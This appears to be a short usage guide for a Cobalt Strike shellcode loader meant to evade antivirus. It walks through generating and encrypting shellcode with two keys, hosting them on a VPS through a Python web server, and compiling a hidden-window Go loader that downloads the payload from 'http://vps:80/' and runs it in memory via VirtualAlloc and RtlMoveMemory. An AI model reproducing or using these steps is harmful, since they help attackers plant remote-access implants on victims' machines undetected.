- Load the Bypass_Remake.cna plugin in CS and generate the shellcode and the encryption keys key1 and key2: "Attack" > "BypassShellCode"
- Encrypt the resulting shellcode and the two key values separately:

  ```
  process_shellcode.exe shellcode
  process_shellcode.exe key1
  process_shellcode.exe key2
  ```

- Manually save the three results as files on the VPS: code.txt, k1.txt, k2.txt
- Start a web server on the VPS:

  ```
  python -m SimpleHTTPServer 80
  ```

- Change the VPS request address in shellcode_loader.go:

  ```go
  var (
      kernel32      = syscall.MustLoadDLL("kernel32.dll")
      ntdll         = syscall.MustLoadDLL("ntdll.dll")
      VirtualAlloc  = kernel32.MustFindProc("VirtualAlloc")
      RtlCopyMemory = ntdll.MustFindProc("RtlMoveMemory")
      URI           = "http://vps:80/"
  )
  ```

- Compile the Go file:

  ```
  go build -ldflags "-H windowsgui" shellcode_loader.go
  ```

- Run shellcode_loader.exe.